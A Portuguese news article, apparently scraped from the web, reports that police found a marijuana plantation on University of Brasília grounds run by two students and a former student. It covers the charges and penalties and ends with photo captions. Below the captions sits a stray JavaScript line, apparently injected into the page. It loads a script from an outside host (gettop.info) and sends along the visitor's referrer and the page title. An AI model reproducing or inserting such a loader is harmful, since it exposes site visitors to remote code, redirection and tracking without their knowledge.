Polícia Civil flagra plantação de maconha na UnB

A Polícia Cívil do Distrito Federal apreendeu uma plantação de maconha nas dependências da Universidade de Brasília (UnB). Dois estudantes de engenharia e um ex-aluno, graduado em administração, cultivavam as plantas e acompanhavam o desenvolvimento através de fotos no celular.

Os jovens tinham 21, 22 e 29 anos. Um dos suspeitos tinha antecedente por posse de drogas e outro prestava concurso para oficial do Corpo de Bombeiros. A Coordenação de Repressão a Entorpecentes (Cord) afirmou que tinha um inquérito em aberto para investigar o crime.

A plantação, que tinha garrafas pet com água para regar as plantas, venenos para formigas e adubos, foi encontrada a cerca de 1,5 quilômetros da área de uso comum do Centro Olímpico. A Polícia Civil lavrou um Termo Circunstanciado por tráfico privilegiado e cultivo para consumo próprio.

As penas podem variar de 7 meses e 1 ano e 8 meses de detenção. Os autores foram liberados após se comprometerem a comparecer à Justiça.

A Polícia Civil lavrou um Termo Circunstanciado por tráfico privilegiado e cultivo para consumo próprio.A Polícia Civil lavrou um Termo Circunstanciado por tráfico privilegiado e cultivo para consumo próprio. Foto: PCDF/Divulgação
A plantação foi encontrada a 1,5 quilômetros da área comum do Centro Olímpico. Foto: PCDF/Divulgação
Policiais conduziram as evidências até a delegacia. Foto: PCDF/Divulgação
As penas podem variar de 7 meses e 1 ano e 8 meses de detenção. Foto: PCDF/Divulgação
Os suspeitos acompanhavam o desenvolvimento das plantas por fotos no celular. Foto: PCDF/Divulgação
No local, havia garrafas pet com água. Foto: PCDF/Divulgação
Além de venenos para formigas e adubo. Foto: PCDF/Divulgação
navigate_before
navigate_next

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário